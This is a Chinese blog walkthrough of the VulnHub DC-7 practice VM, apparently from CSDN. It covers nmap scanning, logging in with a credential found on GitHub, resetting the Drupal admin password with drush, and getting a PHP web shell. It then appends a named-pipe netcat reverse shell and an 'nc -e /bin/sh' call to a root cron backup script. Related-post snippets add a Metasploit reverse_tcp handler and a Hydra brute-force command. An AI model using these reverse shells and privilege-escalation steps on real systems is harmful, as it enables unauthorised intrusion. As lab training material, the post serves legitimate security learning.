vulnhub渗透测试靶机DC-7

最新推荐文章于 2024-10-30 20:49:08 发布
最新推荐文章于 2024-10-30 20:49:08 发布
阅读量538 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46128614/article/details/104037722
版权

下载地址:https://www.vulnhub.com/entry/dc-7,356/

nmap -sT -sV -p- -T5 192.168.49.21
在这里插入图片描述
我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box
在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter
在这里插入图片描述在这里插入图片描述
果然
在这里插入图片描述
我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码
在这里插入图片描述
dc7user: MdR3xOgB7#dW

连上ssh后在dc7user的home目录下发现了gpg加密的website.sql文件和一个mbox邮件
在这里插入图片描述
邮件内容大概为,执行backups.sh文件,备份数据库,任务是定期执行的,根据收件时间间隔判断是15分钟左右一次
去看看这个文件
在这里插入图片描述
这个执行文件的拥有者是root,root所属组是www-data,所以拿到www-data权限,修改这个可执行文件,等待文件自动执行就可以反弹回一个rootshell
在这里插入图片描述
里面用到了drush命令个gpg命令,尝试用gpg解密加密文件失败(太菜了不会用),然后看了一下drush,他是一个drupal的命令行管理软件,看了一下帮助文档有个选项可以修改用户密码
在这里插入图片描述
尝试运行
在这里插入图片描述
被拒绝了,百度google了半天发现,可能要cd到/var/www/html里才能运行成功
在这里插入图片描述
在这里插入图片描述
ok,现在去后台看看
后台文本编辑模块是没有PHP的,需要自己添加(我已经添加上了)
在这里插入图片描述
下载模块
在这里插入图片描述
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
下载成功 点击Enable启用模块
在这里插入图片描述
选中PHP添加进去
在这里插入图片描述
在这里插入图片描述
保存,开启客户端监听,访问那个页面
在这里插入图片描述
shell已经拿到了
直接去修改/opt/script/backup.sh

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.129 9000 >/tmp/f” >> backups.sh
(这段payload是看师傅们都用的这个,用到了命名管道,不懂的朋友可以自己百度一下,但是我不太懂为什么要用一段这么复杂的命令,后面我用nc也能成功弹回一个rootshell)
在这里插入图片描述
然后就等待文件自动执行吧,等一会儿,看邮箱间隔是15分钟大概
等到后就是root权限
在这里插入图片描述

尝试使用nc –e /bin/sh 192.168.49.129 9001
在这里插入图片描述
也成功了
欢迎师傅们指点

Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5176
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3582
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
vulnhubDC7靶机
LainWith的博客
02-14 1544
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
Vulnhub靶机DC-7
过期的秋刀鱼
08-09 615
打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置。目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名。文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,同样的,把靶机跟kali放在同一网段,(NAT模式)一个以root权限定期执行的备份任务,执行文件。,就需要从其他方向找突破口了。目录里,发现都是看不懂的,搜了一下。后缀格式,发现是一种加密的文件格式。的权限,发现所有人都可以执行此文件。查看都有什么文件 ,使用命令。这么个关键词,发现有一个。
VulnHubDC-7
weixin_39219503的博客
02-02 554
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
Vulnhub靶机渗透测试——DC-6
Cobra的博客
05-18 437
一、实验环境 攻击机(kali):192.168.189.148 靶机(ubuntu):192.168.189.186 二、信息收集 1、使用nmap探测存活主机 nmap -sP 192.168.189.0/24 2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描 nmap -sV -A -T4 -p- 192.168.189.186 3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件 4、修改完成后即可正常访问
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-7靶机渗透
m0_62008601的博客
06-02 1129
dc-7靶机的渗透过程
靶机渗透之DC-7
2301_76227305的博客
06-26 642
不算太难的靶机,就是一开始可以搜出来源码可能很难想到。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Vulnhub靶场】DC-7
good good study day day up
10-30 1345
DC-7靶场渗透测试过程,drush命令修改密码,反弹shell提权
DC-7靶机渗透测试
来日可期的博客
08-13 1273
.gpg 后缀的文件通常是使用 GNU Privacy Guard (GPG) 或类似的加密软件创建的加密文件。GPG 是一个开源的加密工具,用于确保数据的机密性和完整性。 .gpg 文件是经过加密的文件,其中包含了原始文件的内容,但使用了加密算法对其进行了保护。这些文件经过加密后,只能通过相应的私钥或密码进行解密,以还原到原始文件。
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1186
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
dc-7 靶机渗透学习
..
03-23 4734
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
Vulnhub DC-7
Pai_Space
03-26 5429
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值